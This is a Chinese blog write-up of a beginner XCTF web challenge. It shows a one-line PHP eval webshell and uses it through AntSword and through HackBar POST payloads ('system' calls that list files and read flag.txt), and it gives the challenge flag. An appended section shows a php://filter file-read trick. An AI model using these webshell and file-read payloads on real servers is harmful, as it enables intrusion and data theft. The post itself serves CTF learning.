XCTF (新手练习) Wed 之 webshell

本文介绍两种利用WebShell解决网络安全挑战的方法。一种使用中国蚁剑工具,另一种则通过火狐浏览器的Hackbar插件进行。文章详细阐述了每一步操作流程及所需注意事项。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

webshell

本题讲解两种办法:

第一种

题目如下图:
附上题目链接:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5070&page=1
在这里插入图片描述 在这里插入图片描述

  这道题主要在于解题工具的准备,解题步骤很简单。工具可以用中国菜刀或者中国蚁剑,但是中国菜刀很容易下载到开有后门的恶意软件,故我用的是中国蚁剑。
(下载链接:中国蚁剑下载和使用说明
工具准备好之后,以下为解题步骤:
第一步:
打开蚁剑后直接在空白处右键点击“添加数据”
在这里插入图片描述出现这样的界面:
在这里插入图片描述
第二步:
添加URL地址即为:http://220.249.52.133:32109/
还要填写连接密码,根据题目的场景中提示的

<?php @eval($_POST['shell']);?>

试着填写“shell”,之后点击界面左上角的“添加”,出现:
在这里插入图片描述第三步:
在这里插入图片描述出现flag文件,打开即出现结果
在这里插入图片描述在这里插入图片描述

第二种

本方法更加简单,需要的工具是火狐浏览器中的插件“Hackbar”
添加插件方法可参考:https://jingyan.baidu.com/article/375c8e1984a71d64f3a22979.html

第一步:
用火狐浏览器打开题目场景,再打开添加好的“Hackbar”插件,界面如下
在这里插入图片描述第二步:
勾选Hackbar插件中的“Enable Post data”,然后构造如下POST请求来查看目录:

shell=system(‘ls’);

在这里插入图片描述

点击“Run”之后出现flag.txt文件
在这里插入图片描述

第三步:
构造如下POST请求来查看flag文件:

shell=system(‘cat flag.txt’);

在这里插入图片描述

点击“Run”之后出现结果

cyberpeace{1671cb9cdad6e8fd7d0f0d557ae3d215}

在这里插入图片描述

### XCTF Web EasyPHP 新手教程 解题思路 在处理XCTF竞赛中的Web类题目时,尤其是涉及`EasyPHP`的新手教程或解题思路,可以从以下几个方面入手: #### 一、理解PHP代码审计基础 PHP代码审计的核心在于发现潜在的安全漏洞。常见的安全问题包括SQL注入、命令执行、文件包含等。对于PHP版本为7.4.28的情况,需特别关注该版本特有的行为和修复的已知漏洞[^1]。 #### 二、利用PHP伪协议绕过过滤机制 PHP支持多种伪协议(如`php://input`, `php://filter`, 和 `data://`),这些可以被用来测试输入验证逻辑是否存在缺陷。例如,在某些情况下,攻击者可以通过`php://filter`实现数据流过滤器链的功能,从而达到读取敏感文件的目的[^2]。 以下是尝试通过`php://filter`读取文件的一个简单示例: ```php <?php $file = 'php://filter/read=convert.base64-encode/resource=config.php'; echo file_get_contents($file); ?> ``` 此脚本会将`config.php`的内容以Base64编码的形式输出到屏幕上。如果目标应用未正确校验传入路径,则可能允许上述操作成功执行。 #### 三、常见易受攻击点分析 针对初学者级别的挑战赛题型设计通常较为直观明了,主要考察参赛选手对基本概念的理解程度。下面列举几个典型的切入点及其对应的防护措施建议: 1. **本地文件包含(LFI)** 如果程序存在可控变量直接拼接到include语句中而未经严格过滤的话,就有可能引发LFI风险。 2. **跨站请求伪造(CSRF)** 当用户的浏览器自动发送认证信息给服务器端的时候,如果没有额外的身份确认步骤,恶意网站就可以冒充合法用户提交表单或者点击链接完成非法动作。 3. **弱密码存储方式** 使用哈希算法加盐的方式代替简单的MD5加密方法能够有效提升账户安全性。 以上每种情况都需要仔细审查源码并采取适当手段加以防范。 #### 四、总结 通过对PHP特性的深入理解和实际案例的研究学习,可以帮助我们更好地应对像XCTF这样的网络安全比赛中的web渗透环节。记住不仅要掌握理论知识还要勤于实践不断积累经验教训才能逐步提高自己的技术水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值